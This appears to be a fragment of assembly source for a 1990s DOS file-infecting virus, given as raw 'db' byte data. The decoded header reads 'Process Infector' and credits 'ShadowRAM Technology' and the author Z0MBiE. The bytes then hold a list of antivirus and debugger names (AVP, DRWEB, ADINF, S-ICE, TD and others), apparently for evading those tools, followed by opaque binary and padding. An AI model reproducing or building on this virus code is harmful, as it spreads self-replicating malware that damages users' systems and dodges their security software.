db 050h,072h,06fh,063h,065h,073h,073h,020h,049h,06eh,066h,065h,063h,074h,06fh
db 072h,00dh,00ah,053h,068h,061h,064h,06fh,077h,052h,041h,04dh,020h,054h,065h
db 063h,068h,06eh,06fh,06ch,06fh,067h,079h,020h,028h,063h,029h,020h,031h,039h
db 039h,036h,02ch,039h,037h,020h,05ah,030h,04dh,042h,069h,045h,00dh,00ah,041h
db 044h,049h,04eh,046h,0f9h,0a3h,0a0h,0a2h,0adh,0aeh,041h,049h,044h,053h,0f9h
db 0afh,0aeh,0a3h,0a0h,0adh,0ech,041h,056h,050h,0f9h,0f9h,0e1h,0a0h,0aah,0e1h
db 0f9h,0f9h,057h,045h,042h,0f9h,0f9h,0e3h,0a9h,0aeh,0a1h,0aeh,0aah,044h,052h
db 057h,045h,042h,0f9h,0e2h,0aeh,0a6h,0a5h,0f9h,0f9h,0e5h,0e3h,0a9h,0adh,0efh
db 0f9h,0f9h,0b0h,0b0h,0b0h,0f9h,0a4h,0a5h,0e0h,0ech,0ach,0aeh,0f9h,043h,050h
db 050h,0adh,0a5h,0adh,0a0h,0a2h,0a8h,0a6h,0e3h,043h,020h,020h,053h,02dh,049h
db 043h,045h,0f9h,0e0h,0e3h,0abh,0a5h,0a7h,054h,044h,0f9h,0ach,0a0h,0e1h,0e2h
db 0f9h,0a4h,0a0h,0a9h,044h,045h,042h,055h,047h,0f9h,0f9h,0a3h,0e3h,0a4h,0f9h
db 057h,045h,042h,037h,030h,038h,030h,031h,0edh,0e2h,0aeh,043h,041h,0f9h,0ach
db 0aeh,0f1h,0f9h,0f9h,041h,056h,0f9h,015h,000h,01eh,051h,000h,0f1h,060h,01eh
db 009h,0bdh,000h,0a3h,0f7h,000h,0fah,005h,074h,00bh,006h,000h,0b4h,022h,000h
db 01eh,0f7h,0ebh,0f1h,0b3h,000h,080h,0dfh,000h,024h,016h,002h,03dh,032h,000h
db 01eh,05eh,000h,095h,025h,0b8h,001h,0c5h,000h,033h,0e1h,000h,0e9h,0c9h,004h
db 0b1h,03eh,000h,0fah,05ah,000h,00bh,04ch,013h,08bh,0cdh,000h,080h,0f9h,000h
db 07fh,0dfh,0e0h,059h,009h,000h,02eh,025h,000h,025h,0e5h,009h,0e8h,037h,000h
db 0e8h,063h,000h,0a4h,0f8h,002h,04bh,009h,000h,050h,025h,000h,025h,052h,084h
db 000h,043h,000h,080h,06fh,000h,04eh,09ah,044h,003h,01ah,000h,050h,046h,000h
db 0adh,0cbh,033h,0c0h,085h,000h,0a1h,0a1h,000h,01bh,0fdh,006h,0a3h,036h,000h
db 0b8h,052h,000h,05bh,0c6h,0e0h,050h,0b2h,000h,09ch,0deh,000h,04eh,0e3h,0c9h
db 08eh,007h,000h,08eh,023h,000h,083h,008h,0a2h,002h,0b3h,000h,091h,0dfh,000h
db 059h,0feh,015h,003h,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
db 03fh,03fh,03fh